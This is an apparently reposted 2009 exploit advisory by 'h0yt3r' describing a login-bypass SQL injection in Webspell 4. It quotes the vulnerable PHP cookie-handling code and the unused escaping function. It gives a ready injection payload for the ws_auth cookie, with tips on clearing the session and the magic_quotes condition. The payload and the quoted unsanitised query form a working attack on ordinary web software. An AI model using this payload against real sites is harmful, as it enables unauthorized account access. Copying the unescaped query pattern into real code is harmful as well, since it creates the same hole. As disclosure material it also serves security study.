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Webspell 4 (Auth Bypass) SQL Injection Vulnerability
来源:www.vfcocus.net 作者:h0yt3r 发布时间:2009-01-04  
#Webspell Login Bypass
#Found by: h0yt3r
#Checklogin.php Line 60:
#        setcookie("ws_auth", $ds['userID'].":".$ws_pwd, time()+($sessionduration*60*60));
#        $login = 1;
#_functions.php Line 253:
#        $login_per_cookie = false;
#        if(isset($_COOKIE['ws_auth']) AND !isset($_SESSION['ws_auth'])) {
#         $login_per_cookie = true;
#         $_SESSION['ws_auth'] = $_COOKIE['ws_auth'];
#        }
#        global $userID, $loggedin;
#        $userID = 0;
#        $loggedin=false;
#        if(isset($_SESSION['ws_auth'])) {
#          if(stristr($_SESSION['ws_auth'], "userid")===FALSE){
#            $authent = explode(":", $_SESSION['ws_auth']);
#            $ws_user = sprintf('%u', $authent[0]);
#            // ws_pwd must be a string without spaces and with a maximum length of 32       <- ???
#                  $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);
#                  if(isset($ws_user) AND isset($ws_pwd)) {
#                $check = safe_query("SELECT userID FROM ".PREFIX."user WHERE userID='$ws_user' AND password='$ws_pwd'");
#                          while($ds=mysql_fetch_array($check)) {
#                      $loggedin=true;
#                            $userID=$ds['userID'];
#                    }
#                }
#                } else die();
#        }
#        ?>

// ws_pwd must be a string without spaces and with a maximum length of 32
                 $ws_pwd = substr(str_replace(' ', '', $authent[1]), 0, 32);

Wuta fuck is dis crap?!
$_COOKIE['ws_auth'] can be exploited by somting like dis:
1:'or/**/1=1/**/limit/**/0,1#   (# <- is a comment, dont forget...)
And btw:
$_SESSION['ws_auth'] = $_COOKIE['ws_auth'];
So dont foget to delete teh session...
Bad thing: Only works wit magic_quotes == off

But they got some function:
#function sql_quote($value) {
#    if( get_magic_quotes_gpc() )    {
#        $value = stripslashes( $value );
#    }
#    if( function_exists( "mysql_real_escape_string" ) ) {
#        $value = mysql_real_escape_string( $value );
#    }
#    else
#    {
#        $value = addslashes( $value );
#        }
#    return $value;
And why in the world isnt it used?!


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